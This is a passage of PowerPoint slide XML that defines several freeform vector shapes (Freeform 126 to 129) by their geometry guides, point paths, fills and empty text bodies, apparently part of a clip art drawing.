                      <a:pt x="28" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="6"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10719" name="Freeform 126"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1226" y="2587"/>
                <a:ext cx="37" cy="11"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 37"/>
                  <a:gd name="T1" fmla="*/ 6 h 11"/>
                  <a:gd name="T2" fmla="*/ 0 w 37"/>
                  <a:gd name="T3" fmla="*/ 6 h 11"/>
                  <a:gd name="T4" fmla="*/ 0 w 37"/>
                  <a:gd name="T5" fmla="*/ 6 h 11"/>
                  <a:gd name="T6" fmla="*/ 1 w 37"/>
                  <a:gd name="T7" fmla="*/ 6 h 11"/>
                  <a:gd name="T8" fmla="*/ 1 w 37"/>
                  <a:gd name="T9" fmla="*/ 5 h 11"/>
                  <a:gd name="T10" fmla="*/ 2 w 37"/>
                  <a:gd name="T11" fmla="*/ 4 h 11"/>
                  <a:gd name="T12" fmla="*/ 4 w 37"/>
                  <a:gd name="T13" fmla="*/ 4 h 11"/>
                  <a:gd name="T14" fmla="*/ 5 w 37"/>
                  <a:gd name="T15" fmla="*/ 3 h 11"/>
                  <a:gd name="T16" fmla="*/ 7 w 37"/>
                  <a:gd name="T17" fmla="*/ 2 h 11"/>
                  <a:gd name="T18" fmla="*/ 9 w 37"/>
                  <a:gd name="T19" fmla="*/ 2 h 11"/>
                  <a:gd name="T20" fmla="*/ 12 w 37"/>
                  <a:gd name="T21" fmla="*/ 0 h 11"/>
                  <a:gd name="T22" fmla="*/ 15 w 37"/>
                  <a:gd name="T23" fmla="*/ 0 h 11"/>
                  <a:gd name="T24" fmla="*/ 19 w 37"/>
                  <a:gd name="T25" fmla="*/ 0 h 11"/>
                  <a:gd name="T26" fmla="*/ 22 w 37"/>
                  <a:gd name="T27" fmla="*/ 0 h 11"/>
                  <a:gd name="T28" fmla="*/ 27 w 37"/>
                  <a:gd name="T29" fmla="*/ 2 h 11"/>
                  <a:gd name="T30" fmla="*/ 32 w 37"/>
                  <a:gd name="T31" fmla="*/ 3 h 11"/>
                  <a:gd name="T32" fmla="*/ 37 w 37"/>
                  <a:gd name="T33" fmla="*/ 4 h 11"/>
                  <a:gd name="T34" fmla="*/ 37 w 37"/>
                  <a:gd name="T35" fmla="*/ 6 h 11"/>
                  <a:gd name="T36" fmla="*/ 36 w 37"/>
                  <a:gd name="T37" fmla="*/ 6 h 11"/>
                  <a:gd name="T38" fmla="*/ 36 w 37"/>
                  <a:gd name="T39" fmla="*/ 5 h 11"/>
                  <a:gd name="T40" fmla="*/ 34 w 37"/>
                  <a:gd name="T41" fmla="*/ 5 h 11"/>
                  <a:gd name="T42" fmla="*/ 33 w 37"/>
                  <a:gd name="T43" fmla="*/ 5 h 11"/>
                  <a:gd name="T44" fmla="*/ 30 w 37"/>
                  <a:gd name="T45" fmla="*/ 4 h 11"/>
                  <a:gd name="T46" fmla="*/ 28 w 37"/>
                  <a:gd name="T47" fmla="*/ 4 h 11"/>
                  <a:gd name="T48" fmla="*/ 25 w 37"/>
                  <a:gd name="T49" fmla="*/ 4 h 11"/>
                  <a:gd name="T50" fmla="*/ 22 w 37"/>
                  <a:gd name="T51" fmla="*/ 3 h 11"/>
                  <a:gd name="T52" fmla="*/ 19 w 37"/>
                  <a:gd name="T53" fmla="*/ 3 h 11"/>
                  <a:gd name="T54" fmla="*/ 15 w 37"/>
                  <a:gd name="T55" fmla="*/ 3 h 11"/>
                  <a:gd name="T56" fmla="*/ 13 w 37"/>
                  <a:gd name="T57" fmla="*/ 3 h 11"/>
                  <a:gd name="T58" fmla="*/ 9 w 37"/>
                  <a:gd name="T59" fmla="*/ 4 h 11"/>
                  <a:gd name="T60" fmla="*/ 7 w 37"/>
                  <a:gd name="T61" fmla="*/ 5 h 11"/>
                  <a:gd name="T62" fmla="*/ 5 w 37"/>
                  <a:gd name="T63" fmla="*/ 6 h 11"/>
                  <a:gd name="T64" fmla="*/ 2 w 37"/>
                  <a:gd name="T65" fmla="*/ 9 h 11"/>
                  <a:gd name="T66" fmla="*/ 0 w 37"/>
                  <a:gd name="T67" fmla="*/ 11 h 11"/>
                  <a:gd name="T68" fmla="*/ 0 w 37"/>
                  <a:gd name="T69" fmla="*/ 6 h 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1"/>
                  <a:gd name="T107" fmla="*/ 37 w 37"/>
                  <a:gd name="T108" fmla="*/ 11 h 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1">
                    <a:moveTo>
                      <a:pt x="0" y="6"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="6"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10720" name="Freeform 127"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1261" y="2576"/>
                <a:ext cx="61" cy="112"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 61"/>
                  <a:gd name="T1" fmla="*/ 0 h 112"/>
                  <a:gd name="T2" fmla="*/ 0 w 61"/>
                  <a:gd name="T3" fmla="*/ 108 h 112"/>
                  <a:gd name="T4" fmla="*/ 19 w 61"/>
                  <a:gd name="T5" fmla="*/ 112 h 112"/>
                  <a:gd name="T6" fmla="*/ 18 w 61"/>
                  <a:gd name="T7" fmla="*/ 98 h 112"/>
                  <a:gd name="T8" fmla="*/ 61 w 61"/>
                  <a:gd name="T9" fmla="*/ 104 h 112"/>
                  <a:gd name="T10" fmla="*/ 61 w 61"/>
                  <a:gd name="T11" fmla="*/ 98 h 112"/>
                  <a:gd name="T12" fmla="*/ 30 w 61"/>
                  <a:gd name="T13" fmla="*/ 94 h 112"/>
                  <a:gd name="T14" fmla="*/ 29 w 61"/>
                  <a:gd name="T15" fmla="*/ 81 h 112"/>
                  <a:gd name="T16" fmla="*/ 9 w 61"/>
                  <a:gd name="T17" fmla="*/ 81 h 112"/>
                  <a:gd name="T18" fmla="*/ 8 w 61"/>
                  <a:gd name="T19" fmla="*/ 80 h 112"/>
                  <a:gd name="T20" fmla="*/ 7 w 61"/>
                  <a:gd name="T21" fmla="*/ 76 h 112"/>
                  <a:gd name="T22" fmla="*/ 6 w 61"/>
                  <a:gd name="T23" fmla="*/ 69 h 112"/>
                  <a:gd name="T24" fmla="*/ 4 w 61"/>
                  <a:gd name="T25" fmla="*/ 58 h 112"/>
                  <a:gd name="T26" fmla="*/ 2 w 61"/>
                  <a:gd name="T27" fmla="*/ 46 h 112"/>
                  <a:gd name="T28" fmla="*/ 1 w 61"/>
                  <a:gd name="T29" fmla="*/ 34 h 112"/>
                  <a:gd name="T30" fmla="*/ 2 w 61"/>
                  <a:gd name="T31" fmla="*/ 18 h 112"/>
                  <a:gd name="T32" fmla="*/ 6 w 61"/>
                  <a:gd name="T33" fmla="*/ 3 h 112"/>
                  <a:gd name="T34" fmla="*/ 0 w 61"/>
                  <a:gd name="T35" fmla="*/ 0 h 1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1"/>
                  <a:gd name="T55" fmla="*/ 0 h 112"/>
                  <a:gd name="T56" fmla="*/ 61 w 61"/>
                  <a:gd name="T57" fmla="*/ 112 h 1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1" h="112">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="001999"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10721" name="Freeform 128"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1291" y="2550"/>
                <a:ext cx="79" cy="15"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 79"/>
                  <a:gd name="T1" fmla="*/ 15 h 15"/>
                  <a:gd name="T2" fmla="*/ 0 w 79"/>
                  <a:gd name="T3" fmla="*/ 15 h 15"/>
                  <a:gd name="T4" fmla="*/ 3 w 79"/>
                  <a:gd name="T5" fmla="*/ 14 h 15"/>
                  <a:gd name="T6" fmla="*/ 4 w 79"/>
                  <a:gd name="T7" fmla="*/ 14 h 15"/>
                  <a:gd name="T8" fmla="*/ 7 w 79"/>
                  <a:gd name="T9" fmla="*/ 13 h 15"/>
                  <a:gd name="T10" fmla="*/ 11 w 79"/>
                  <a:gd name="T11" fmla="*/ 12 h 15"/>
                  <a:gd name="T12" fmla="*/ 14 w 79"/>
                  <a:gd name="T13" fmla="*/ 10 h 15"/>
                  <a:gd name="T14" fmla="*/ 19 w 79"/>
                  <a:gd name="T15" fmla="*/ 9 h 15"/>
                  <a:gd name="T16" fmla="*/ 24 w 79"/>
                  <a:gd name="T17" fmla="*/ 8 h 15"/>
                  <a:gd name="T18" fmla="*/ 30 w 79"/>
                  <a:gd name="T19" fmla="*/ 8 h 15"/>
                  <a:gd name="T20" fmla="*/ 35 w 79"/>
                  <a:gd name="T21" fmla="*/ 7 h 15"/>
                  <a:gd name="T22" fmla="*/ 42 w 79"/>
                  <a:gd name="T23" fmla="*/ 7 h 15"/>
                  <a:gd name="T24" fmla="*/ 48 w 79"/>
                  <a:gd name="T25" fmla="*/ 6 h 15"/>
                  <a:gd name="T26" fmla="*/ 55 w 79"/>
                  <a:gd name="T27" fmla="*/ 7 h 15"/>
                  <a:gd name="T28" fmla="*/ 62 w 79"/>
                  <a:gd name="T29" fmla="*/ 7 h 15"/>
                  <a:gd name="T30" fmla="*/ 69 w 79"/>
                  <a:gd name="T31" fmla="*/ 8 h 15"/>
                  <a:gd name="T32" fmla="*/ 76 w 79"/>
                  <a:gd name="T33" fmla="*/ 9 h 15"/>
                  <a:gd name="T34" fmla="*/ 79 w 79"/>
                  <a:gd name="T35" fmla="*/ 0 h 15"/>
                  <a:gd name="T36" fmla="*/ 79 w 79"/>
                  <a:gd name="T37" fmla="*/ 0 h 15"/>
                  <a:gd name="T38" fmla="*/ 76 w 79"/>
                  <a:gd name="T39" fmla="*/ 0 h 15"/>
                  <a:gd name="T40" fmla="*/ 74 w 79"/>
                  <a:gd name="T41" fmla="*/ 0 h 15"/>
                  <a:gd name="T42" fmla="*/ 70 w 79"/>
                  <a:gd name="T43" fmla="*/ 0 h 15"/>
                  <a:gd name="T44" fmla="*/ 66 w 79"/>
                  <a:gd name="T45" fmla="*/ 0 h 15"/>
                  <a:gd name="T46" fmla="*/ 61 w 79"/>
                  <a:gd name="T47" fmla="*/ 0 h 15"/>
                  <a:gd name="T48" fmla="*/ 56 w 79"/>
                  <a:gd name="T49" fmla="*/ 0 h 15"/>
                  <a:gd name="T50" fmla="*/ 51 w 79"/>
                  <a:gd name="T51" fmla="*/ 1 h 15"/>
                  <a:gd name="T52" fmla="*/ 44 w 79"/>
                  <a:gd name="T53" fmla="*/ 1 h 15"/>
                  <a:gd name="T54" fmla="*/ 38 w 79"/>
                  <a:gd name="T55" fmla="*/ 1 h 15"/>
                  <a:gd name="T56" fmla="*/ 31 w 79"/>
                  <a:gd name="T57" fmla="*/ 2 h 15"/>
                  <a:gd name="T58" fmla="*/ 25 w 79"/>
                  <a:gd name="T59" fmla="*/ 3 h 15"/>
                  <a:gd name="T60" fmla="*/ 18 w 79"/>
                  <a:gd name="T61" fmla="*/ 5 h 15"/>
                  <a:gd name="T62" fmla="*/ 12 w 79"/>
                  <a:gd name="T63" fmla="*/ 6 h 15"/>
                  <a:gd name="T64" fmla="*/ 6 w 79"/>
                  <a:gd name="T65" fmla="*/ 7 h 15"/>
                  <a:gd name="T66" fmla="*/ 0 w 79"/>
                  <a:gd name="T67" fmla="*/ 8 h 15"/>
                  <a:gd name="T68" fmla="*/ 0 w 79"/>
                  <a:gd name="T69" fmla="*/ 15 h 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9"/>
                  <a:gd name="T106" fmla="*/ 0 h 15"/>
                  <a:gd name="T107" fmla="*/ 79 w 79"/>
                  <a:gd name="T108" fmla="*/ 15 h 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9" h="15">
                    <a:moveTo>
                      <a:pt x="0" y="15"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="15"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10722" name="Freeform 129"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1246" y="2690"/>
                <a:ext cx="132" cy="45"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 55 w 132"/>
                  <a:gd name="T1" fmla="*/ 43 h 45"/>
                  <a:gd name="T2" fmla="*/ 56 w 132"/>
                  <a:gd name="T3" fmla="*/ 43 h 45"/>
                  <a:gd name="T4" fmla="*/ 56 w 132"/>
                  <a:gd name="T5" fmla="*/ 42 h 45"/>
                  <a:gd name="T6" fmla="*/ 57 w 132"/>
                  <a:gd name="T7" fmla="*/ 42 h 45"/>
                  <a:gd name="T8" fmla="*/ 59 w 132"/>
                  <a:gd name="T9" fmla="*/ 41 h 45"/>
                  <a:gd name="T10" fmla="*/ 61 w 132"/>
                  <a:gd name="T11" fmla="*/ 41 h 45"/>
                  <a:gd name="T12" fmla="*/ 63 w 132"/>
                  <a:gd name="T13" fmla="*/ 40 h 45"/>
                  <a:gd name="T14" fmla="*/ 65 w 132"/>
                  <a:gd name="T15" fmla="*/ 39 h 45"/>
                  <a:gd name="T16" fmla="*/ 68 w 132"/>
                  <a:gd name="T17" fmla="*/ 38 h 45"/>
                  <a:gd name="T18" fmla="*/ 71 w 132"/>
                  <a:gd name="T19" fmla="*/ 36 h 45"/>
                  <a:gd name="T20" fmla="*/ 73 w 132"/>
                  <a:gd name="T21" fmla="*/ 34 h 45"/>
                  <a:gd name="T22" fmla="*/ 76 w 132"/>
                  <a:gd name="T23" fmla="*/ 33 h 45"/>
                  <a:gd name="T24" fmla="*/ 78 w 132"/>
                  <a:gd name="T25" fmla="*/ 32 h 45"/>
                  <a:gd name="T26" fmla="*/ 80 w 132"/>
                  <a:gd name="T27" fmla="*/ 29 h 45"/>
                  <a:gd name="T28" fmla="*/ 82 w 132"/>
                  <a:gd name="T29" fmla="*/ 28 h 45"/>
                  <a:gd name="T30" fmla="*/ 84 w 132"/>
                  <a:gd name="T31" fmla="*/ 26 h 45"/>
                  <a:gd name="T32" fmla="*/ 85 w 132"/>
                  <a:gd name="T33" fmla="*/ 24 h 45"/>
                  <a:gd name="T34" fmla="*/ 0 w 132"/>
                  <a:gd name="T35" fmla="*/ 3 h 45"/>
                  <a:gd name="T36" fmla="*/ 6 w 132"/>
                  <a:gd name="T37" fmla="*/ 0 h 45"/>
                  <a:gd name="T38" fmla="*/ 132 w 132"/>
                  <a:gd name="T39" fmla="*/ 32 h 45"/>
                  <a:gd name="T40" fmla="*/ 126 w 132"/>
                  <a:gd name="T41" fmla="*/ 34 h 45"/>
                  <a:gd name="T42" fmla="*/ 90 w 132"/>
                  <a:gd name="T43" fmla="*/ 25 h 45"/>
                  <a:gd name="T44" fmla="*/ 90 w 132"/>
                  <a:gd name="T45" fmla="*/ 25 h 45"/>
                  <a:gd name="T46" fmla="*/ 90 w 132"/>
                  <a:gd name="T47" fmla="*/ 26 h 45"/>
                  <a:gd name="T48" fmla="*/ 89 w 132"/>
                  <a:gd name="T49" fmla="*/ 26 h 45"/>
                  <a:gd name="T50" fmla="*/ 89 w 132"/>
                  <a:gd name="T51" fmla="*/ 27 h 45"/>
                  <a:gd name="T52" fmla="*/ 87 w 132"/>
                  <a:gd name="T53" fmla="*/ 28 h 45"/>
                  <a:gd name="T54" fmla="*/ 86 w 132"/>
                  <a:gd name="T55" fmla="*/ 29 h 45"/>
                  <a:gd name="T56" fmla="*/ 85 w 132"/>
                  <a:gd name="T57" fmla="*/ 31 h 45"/>
                  <a:gd name="T58" fmla="*/ 83 w 132"/>
                  <a:gd name="T59" fmla="*/ 32 h 45"/>
                  <a:gd name="T60" fmla="*/ 80 w 132"/>
                  <a:gd name="T61" fmla="*/ 33 h 45"/>
                  <a:gd name="T62" fmla="*/ 78 w 132"/>
                  <a:gd name="T63" fmla="*/ 35 h 45"/>
                  <a:gd name="T64" fmla="*/ 76 w 132"/>
                  <a:gd name="T65" fmla="*/ 36 h 45"/>
                  <a:gd name="T66" fmla="*/ 72 w 132"/>
                  <a:gd name="T67" fmla="*/ 38 h 45"/>
                  <a:gd name="T68" fmla="*/ 70 w 132"/>
                  <a:gd name="T69" fmla="*/ 40 h 45"/>
                  <a:gd name="T70" fmla="*/ 65 w 132"/>
                  <a:gd name="T71" fmla="*/ 41 h 45"/>
                  <a:gd name="T72" fmla="*/ 62 w 132"/>
                  <a:gd name="T73" fmla="*/ 43 h 45"/>
                  <a:gd name="T74" fmla="*/ 57 w 132"/>
                  <a:gd name="T75" fmla="*/ 45 h 45"/>
                  <a:gd name="T76" fmla="*/ 55 w 132"/>
                  <a:gd name="T77" fmla="*/ 43 h 4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45"/>
                  <a:gd name="T119" fmla="*/ 132 w 132"/>
                  <a:gd name="T120" fmla="*/ 45 h 4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45">
                    <a:moveTo>
                      <a:pt x="55" y="43"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="56" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="43"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
